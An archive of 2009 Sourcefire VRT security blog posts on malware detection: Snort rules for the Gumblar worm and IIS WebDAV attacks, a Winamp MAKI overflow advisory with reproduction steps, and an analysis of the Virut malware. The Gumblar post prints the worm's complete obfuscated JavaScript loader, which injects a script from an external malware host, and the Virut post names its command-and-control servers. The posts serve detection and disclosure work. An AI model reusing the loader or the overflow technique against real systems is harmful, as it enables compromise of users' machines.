Thursday, May 28, 2009

DoJoSec Meeting - June 4th

The DoJoSec lineup for the June meeting has been announced and our own Alain Zidouemba will be giving a presentation entitled "What to do with the Unknown".

Alain will be demonstrating what options are available to the administrator when an unknown piece of malware is encountered.

To register for DoJoSec please visit http://www.dojosec.com/, sign up and be there on Thursday. Other members of the VRT will be on hand to answer any questions you may have on Snort, Snort rules, Exploitation and General Mayhem.

Friday, May 22, 2009

Gumblar and More On Javascript Obfuscation

A couple of months ago I put together a post on detection of obfuscated JavaScript. Not surprisingly, that topic has popped back up on the VRT radar screen this week, this time in the context of something much more interesting - Gumblar, the new worm that everyone is talking about.

For anyone who hasn't heard, Gumblar is a piece of malware named for the web site that was originally hosting it - hxxp://gumblar.cn (WARNING! Live Malware site!). It spreads via two primary mechanisms: stealing FTP credentials from compromised systems and using them to infect web sites, and delivering a malicious JavaScript payload via those compromised sites that hits client systems with a combination of Acrobat and Flash exploits. Once inside a user's system, Gumblar redirects Google search results to malware-laden pages, dropping all sorts of nastiness on victims' systems.

Generally speaking, Gumblar looks a lot like any other piece of obfuscated JavaScript malware:

(function(ljk8K){var q0UFt='%';var ikN7=('va_72_20a_3d_22ScriptEngi_6ee_22_2cb_3d_22Version(_29+_22_2cj_3d_22_22_2cu_3d_6e
avigator_2euserAge_6et_3bif((u_2eind_65xOf(_22C_68_72ome_22)_3c0_29_26_26_28_75_2ei_6edex_4f_
66(_22Win_22)_3e0)_26_26(u_2e_69nde_78Of(_22N_54_206_22)_3c_30)_26_26(doc_75_6de_6et_2ecoo_6b_
69e_2ein_64exOf(_22miek_3d1_22)_3c_30_29_26_26_28ty_70eof_28zrvzts_29_21_3dtypeof(_22A_22_29))_
7bzrv_7ats_3d_22_41_22_3beval(_22_69_66(window_2e_22+a+_22)_6a_3d_6a+_22_2ba_2b_22_4dajo_72_22+
b+a+_22M_69nor_22_2b_62+a+_22_42uild_22+b_2b_22_6a_3b_22)_3b_64_6f_63um_65nt_2ewr_69te(_22_3c_73
cr_69pt_20src_3d_2f_2fma_22_2b_22_72_74_75_7a_2ecn_2fvi_64_2f_3fid_3d_22+j+_22_3e_3c_5c_2fs_63
ript_3e_22)_3b_7d').replace(ljk8K,q0UFt);var pbEO=unescape(ikN7);eval(pbEO)})(/\_/g);

Note: line breaks inserted above for readability - there are none in the actual exploit

What makes it stand out in the crowd of malicious JavaScript is its prevalence: a week ago Sophos declared it the fastest-growing threat on the Internet, and it has only continued to spread since.

Unfortunately, the rule discussed in my last blog post on obfuscated JavaScript - GID 1, SID 15363 - does not fire on Gumblar: while that rule's search for "eval(" and "unescape(" within 15 bytes of each other succeeds on many variants of Gumblar, and the underlying logic of looking for a large block of data inside of a call to unescape() is also valid, the JavaScript payload being obfuscated by Gumblar contains items like indexOf(), document.write(), etc. that are not completely escaped out - and thus the closing parentheses from these calls causes the rule to fail, since it requires no close parentheses within 250 bytes of the start of the unescape() call. It's not that the rule itself is useless - there's plenty of malware out there that it still catches - it's just that Gumblar is just smart (or lucky) enough to take advantage of a known evasion case.

Given the reality that tracking nested parentheses isn't happening in Snort - or any IDS, for that matter - any time soon, we can't directly address that evasion case. With that in mind, the VRT decided to try to look for other characteristics inside of Gumblar's JavaScript that we could use to detect it. After poring through hundreds of samples of Gumblar's malicious HTML, it quickly became clear that anything common to the obfuscated payload itself would be of very limited use, since the obfuscation method changes in subtle ways between different infected web sites, and sometimes even between different pages on the same infected site.

There are, however, several characteristics that are common to all of the different JavaScript payloads:

  • They're all composed of very long lines (500+ bytes) that have a function declaration within a few bytes of the start of the line

  • They all contain either "eval(unescape(..." or "unescape(...)...eval()"

  • They all use the replace() function to aid the de-obfuscation process


This combination of items makes for a specific enough set of criteria that false positives should be minimal - as I stated in my last post, legit JavaScript code has little to no reason to obfuscate itself like this - while still remaining generic enough to catch all the variants of Gumblar we've tested (and, quite likely, other pieces of malware that use similar logic). In fact, we can likely even leave out the call to replace() from our rule and still be in good shape - since it's the most easily removed portion of the equation if you want your nasty JavaScript to go undetected, and the other conditions are so rarely together in legitimate situations anyway.

Putting this all together, you come up with the following pair of rules:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-CLIENT obfuscated javascript function eval unescape long line"; flow:established,to_client; content:"function|28|"; nocase; content:!"|0A|"; within:500; content:"eval|28|"; nocase; content:"unescape|28|"; nocase; pcre:"/^.{0,5}function\x28[^\n]+eval\x28[^\n]{0,15}unescape\x28/smi"; metadata: service http; reference:url,www.cs.ucsb.edu/~marco/blog/2008/10/dom-based-obfuscation-in-malicious-javascript.html; reference:url,blog.scansafe.com/display/Search?searchQuery=gumblar; classtype:misc-attack;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-CLIENT obfuscated javascript function unescape eval long line"; flow:established,to_client; content:"function|28|"; nocase; content:!"|0A|"; within:500; content:"eval|28|"; nocase; content:"unescape|28|"; nocase; pcre:"/^.{0,5}function\x28[^\n]+unescape\x28[^\n]{0,15}eval\x28/smi"; metadata: service http; reference:url,www.cs.ucsb.edu/~marco/blog/2008/10/dom-based-obfuscation-in-malicious-javascript.html; reference:url,blog.scansafe.com/display/Search?searchQuery=gumblar; classtype:misc-attack;)

We're still testing this out here in VRT-land, to make sure that it doesn't fire on some common JavaScript case that we haven't thought of. In the meantime, though, we wanted to make this available for anyone who's concerned about Gumblar. Use at your own risk - and please, if you use it, send your feedback to research at sourcefire dot com.

Note: These rules are covered by the Sourcefire VRT Certified Rules License agreement available here: http://www.snort.org/about_snort/licenses/vrt_license.html

Wednesday, May 20, 2009

Winamp MAKI Parsing Vulnerability Details

About two months ago, we found a vulnerability in the Winamp 5.55 MAKI script parsing module. We reported our findings to AOL. AOL then released Winamp version 5.552 with the fix. Here are the details:

Winamp MAKI Parsing Integer Overflow Vulnerability

Vendor:
AOL/Nullsoft

Severity:
High

Systems Affected:
Winamp 5.55 and prior versions that support Modern Skins.

Overview:
A vulnerability exists in Winamp. The vulnerability is due to an incorrect type cast while parsing a .maki file (a compiled script file), causing a buffer overflow. An attacker could provide a user with a modern skin (via a webpage download for example) that uses the maki script to execute arbitrary code within the context of the current user.

Technical Details:
Winamp’s modern skins scripting engine reads strings from the .maki file. The format of these strings is composed as follows (multi-byte values are in little endian byte order):

Offset Size Description
--------- ------ --------------------------------------
0x0000 4 Unknown (it seems to be a type code)
0x0004 2 Length (Y)
0x0006 Y Function name

When gen_ff.dll parses a .maki file, it reads two bytes and does a sign extension, which results in a stack buffer overflow.

The following shows the local buffer size (0x10008):

.text:12094DAB var_10144= byte ptr -10144h
.text:12094DAB MultiByteStr= byte ptr -13ch

If a string size is greater than or equal to 0x8000, edi will be 0xFFFFhhhh (where, 0xhhhh is the two byte input)

.text:12094F62 loc_12094F62:
.text:12094F62 mov ax, [ebx]
.text:12094F65 movsx edi, ax ; sign extension
.text:12094F68 inc ebx
.text:12094F69 push edi ; Size
.text:12094F6A inc ebx
.text:12094F6B lea eax, [ebp+MultiByteStr]
.text:12094F71 push ebx ; Src
.text:12094F72 push eax ; Dst, buffer is located in the stack
.text:12094F73 call memmove

.text:120951E5 loc_120951E5:
.text:120951E5 mov edi, [ebx]
.text:120951E7 add ebx, 4
.text:120951EA mov ax, [ebx]
.text:120951ED movsx esi, ax ; sign extension
.text:120951F0 inc ebx
.text:120951F1 push esi ; Size
.text:120951F2 inc ebx
.text:120951F3 lea eax, [ebp+var_10144]
.text:120951F9 push ebx ; Src
.text:120951FA push eax ; Dst, buffer is located in the stack
.text:120951FB call memmove

Reproduction:
I used the Bento skin’s maki file. The highlighted text in the following figure shows the two byte size (value is 0x0011) and the following 17 characters. I changed the size to 0xFFFF and inserted a lot of 0x41 (obviously more than 0xFFFF). Then BANG! EIP was overwitten with 0x41414141.



Resolution:
Sourcefire released detection for this issue (gid:3 sid:15433) on 2009-03-31
Vendor released Winamp 5.552 on 2009-04-11

Update:
This issue now has a Bugtraq entry, available here: http://www.securityfocus.com/bid/35052

Rules to detect IIS 6.0 WebDAV exploit

Thanks for the inquiries. Here are rules that detect attacks against IIS 6.0 with WebDAV enabled.

(see yesterdays post for details)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV COPY remote authentication bypass attempt"; flow:to_server,established; content:"COPY"; http_method; pcre:"/^COPY\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:1; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV PROPFIND remote authentication bypass attempt"; flow:to_server,established; content:"PROPFIND"; http_method; pcre:"/^PROPFIND\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:2; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV PROPPATCH remote authentication bypass attempt"; flow:to_server,established; content:"PROPPATCH"; http_method; pcre:"/^PROPPATCH\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:3; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV MKCOL remote authentication bypass attempt"; flow:to_server,established; content:"MKCOL"; http_method; pcre:"/^MKCOL\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:4; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV MOVE remote authentication bypass attempt"; flow:to_server,established; content:"MOVE"; http_method; pcre:"/^MOVE\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:5; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV LOCK remote authentication bypass attempt"; flow:to_server,established; content:"LOCK"; http_method; pcre:"/^LOCK\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:6; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV UNLOCK remote authentication bypass attempt"; flow:to_server,established; content:"UNLOCK"; http_method; pcre:"/^UNLOCK\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:7; rev:1;)


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV DAV remote authentication bypass attempt"; flow:to_server,established; content:"DAV"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:8; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Destination remote authentication bypass attempt"; flow:to_server,established; content:"Destination"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:9; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Depth remote authentication bypass attempt"; flow:to_server,established; content:"Depth"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:10; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV If remote authentication bypass attempt"; flow:to_server,established; content:"If"; http_header; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:11; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Lock-Token remote authentication bypass attempt"; flow:to_server,established; content:"Lock-Token"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:12; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Overwrite remote authentication bypass attempt"; flow:to_server,established; content:"Overwrite"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:13; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Timeout remote authentication bypass attempt"; flow:to_server,established; content:"Timeout"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:14; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Translate remote authentication bypass attempt"; flow:to_server,established; content:"Translate"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:15; rev:1;)

Note: These rules are covered by the Sourcefire VRT Certified Rules License agreement available here: http://www.snort.org/about_snort/licenses/vrt_license.html

Also, some browsers do not wrap the rules properly but highlight, copy and paste works just fine.

Tuesday, May 19, 2009

Snort protection against IIS 6.0 WebDAV exploit

Microsoft Security Advisory (971491) published on May 18, 2009 concerns a vulnerability in IIS that may allow unauthorized access to an area of a website that would normally be protected.

An attack against IIS 6.0 with WebDAV enabled was published at milw0rm (http://www.milw0rm.com/exploits/8704).

Snort already has coverage for this vulnerability by using the http_inspect preprocessor. In order to detect attacks, make sure that ascii yes or utf_8 yes is added to your configuration.

For example:

preprocessor http_inspect_server: server default \
ports { 80 8080 } \
server_flow_depth 0 \
ascii yes \ # or “utf_8 yes”
double_decode yes \
non_rfc_char { 0x00 } \
chunk_length 500000 \
non_strict \
oversize_dir_length 300


It is also possible to detect this activity using rules, if there is sufficient interest, let us know and we'll post them here.

Wednesday, May 13, 2009

IP Blacklisting in Snort

Our Supreme Overlord and Benevolent Dictator, Marty Roesch, had a little free time on his hands over the weekend and spent some of it writing a new preprocessor for Snort 2.8.4.1 that implements IP blacklisting. This should help a great deal with performance for those folks who like to use Snort as a pseudo firewall.

Currently, the patch works and Snort successfully builds on OS X, Fedora and Ubuntu, it may work out of the box on other systems but these are the ones that have been tested so far. There are some requirements and you really need to read the README.iplist that comes in the tarball.

Remember, this code is EXPERIMENTAL and your mileage may vary when using it.

Here's a link to the patch: http://www.snort.org/users/roesch/code/iplist.patch.tgz

Here's a link to Marty's blogpost: http://securitysauce.blogspot.com/2009/05/ip-blacklisting-for-snort-2841.html

Have fun!

EDIT: I also got the patch to work on FreeBSD.

Tuesday, May 12, 2009

Microsoft Tuesday Coverage for May MS09-017

Microsoft Security Advisory MS09-017:
Microsoft PowerPoint contains several programming errors that may allow a remote attacker to execute code on a vulnerable system via a specially crafted PowerPoint file.

Rules to detect attacks targeting these vulnerabilities are included in this release and are identified with GID 3, SIDs 15498 through 15506.

Additionally, a previously released rule identified with GID 3, SID 15454 will also detect attacks targeting these vulnerabilities.

Here's the link: http://www.snort.org/vrt/advisories/vrt-rules-2009-05-12.html

Exploit Development Class

Want to impress your friends, colleagues, girls, boys, employer, future employer? Want to become more attractive to the opposite sex? Want to make your past employer and/or ex-(girlfriend|boyfriend|spouse) jealous? Then you need to get dangerous and become awesome.

We're running a fundamentals of exploit development class here in Columbia, MD in June. Three days, 23rd to the 25th to be exact. It will take you from knowing absolutely nothing to writing your own exploits in a very short time. For more details and to sign up, check out these corporate links:

http://www.sourcefire.com/services/education/courses/

http://www.sourcefire.com/services/education/schedule/

We've run the class before and it's been extremely well received and very successful, so if you want to get in on the exploit development action, sign up and we'll see you there. One more thing, this is a Sourcefire VRT run class, so you'll be getting the information straight from the horses mouth (so to speak), no fluff, no cheese, straight up exploit knowledge. (We might even drop some 0day, we did last time)

Monday, May 11, 2009

Estimating Time

One of the developers here at Sourcefire, Andrew Williams, has written what we think is an interesting piece on Estimating Time for project planning. Take a look at it here: http://www.baltdad.com/2009/05/estimation/

Friday, May 8, 2009

Snort and Neural Networks

Jacson Rodrigues Correia da Silva just finished his Bachelors degree in computer science. As part of his final project, he came up with an implementation that allows you to use Snort with JavaNNS. (see http://www.cis.cau.edu/675/javasnns.html). This means, you could use Snort in an artificial neural network. Pretty cool no?

You can find his work here: http://jacsonrcsilva.googlepages.com/snort-rna (it's in Portuguese, but you can figure it out right?)

Jacson is now working on his Masters degree, hopefully he'll have more cool stuff to show off when he's done with that too.

DoJoSec and dnssnarf

One of our IT guys, (total security geek Christopher McBee) found some interesting information from last nights DoJoSec meeting. Here's what he has to say:

During Sean Wilkerson's talk at last nights DojoSec meeting (http://www.dojosec.com), Sean discussed some simple open source monitoring tools included in the dsniff suite including urlsnarf, mailsnarf, etc used for validating assumptions about your security infrastructure and products. One of the questions during the talk was for a tool similar to these for DNS snarfing. Twenty minutes and 6 lines of python later. The output is in bind query log format so you should be able to throw it into your favorite query log parsing tool.

from scapy import *

def dns_callback(pkt):
if DNS in pkt and pkt[UDP].dport == 53:
print pkt.sprintf("client %IP.src%#%UDP.sport%: query: ") + \
pkt[DNSQR].qname + " " + pkt[DNSQR].sprintf("%qclass% %qtype% +")

iface = (sys.argv[1] if (len(sys.argv) > 1) else 'eth0')
sniff(iface=iface, prn=dns_callback, filter="udp and port 53", store=0)

Tuesday, May 5, 2009

Rule release for today - May 5th 2009

Adobe Reader Code Execution (CVE-2009-1492):
The JavaScript API in Adobe Reader may allow a remote attacker to execute code on an affected system. The problem occurs when specially crafted JavaScript uses the getAnnots method in a PDF document.

A rule to detect attacks targeting this vulnerability is included in this release and is identified with GID 1, SID 15493.

Adobe Reader Buffer Overflow (CVE-2009-1493):
The JavaScript API in Adobe Reader may allow a remote attacker to execute code on an affected system. The problem occurs when specially crafted JavaScript uses the customDictionaryOpen method in a PDF document.

A rule to detect attacks targeting this vulnerability is included in this release and is identified with GID 1, SID 15492.

Additionally as a result of ongoing research, the Sourcefire VRT has added multiple rules to the exploit, specific-threats, backdoor, multimedia and chat rule sets to provide coverage for emerging threats from these technologies.

Details available here

Virut Analysis and Snort Rule

Virut (from virus + trojan) is a family of malware that has been around in since about 2006. Unfortunately for us, it is still around 3 years later with new variants being released on regular basis. We came across a recent Virut sample (MD5:e68c4b9428f41036b1cf890d93bdf390) and took a closer look at it:

Immediately after the file is executed, it establishes an encrypted connection to irc.zief.pl:65520 (should it fail, the back up server is proxim.ircgalaxy.pl) to contact it's command and control server. Virut then downloads several executable files from adx2.2288.org disguised as "non files" (per the file extensions):

  • adx.gif, a Trojan downloader
  • 8.txt, a password stealer. An analysis of 8.txt shows the following strings embedded in it:


Strings in executable 8.txt
Pic.1: Strings embedded in executable "8.txt"

The network traffic confirms that "8.txt" it is a password stealing Trojan:

pcap showing the password stealer in action
Pic.2: Network traffic showing password-stealing Trojan in action

Additional malware is downloaded from put.ghura.pl:

  • out.exe
  • adrtv.exe
  • ad2.exe

Note that the files downloaded, including their names have the potential of being completely different every time because of Virut gets commands on what to do at runtime through its connection to the C&C server.

Virut is also a classic "virus" in the sense that it spreads from file to file by appending malicious code to clean files, making them some 20 kb larger than before. In infected files, a jump (JMP) instruction is inserted to point to the end of the original file. Picture 3 shows the virus entry point.

Virut creates an entry point in the executable it infects in order to call the viral code
Pic.3: Virut entry point


This variant of Virut is also an entry-point obscuring virus. Different infected files show that the virus' entry point is always at different offsets relative to the entry point of the infected files. Virut patches the code of the executables so that the virus is not always invoked when the files are run, but is called randomly.

Additionally, Virut is highly polymorphic. Pictures 4 and 5 show the file-appending virus code for 2 infected exectutables. The two set of instructions do not match at all because Virut uses garbage instructions and a different decryptor for for each file it infects, making analysis more difficult.

Virut polymorphic code
Pic.4: Virut code appended to an executable


Virut polymorphic code
Pic.5: Virut code appended to another executable

According to VirusBulletin (www.virusbtn.com), the malware family Virut was the 5th most prevalent in March 2009. Virut has used the same domain name for the server it contacts when it is initally run. Rules to detect detect Virut attempting to contact its command and control server will be released in the near future. I will then update this blog post with the GIDs and SIDs.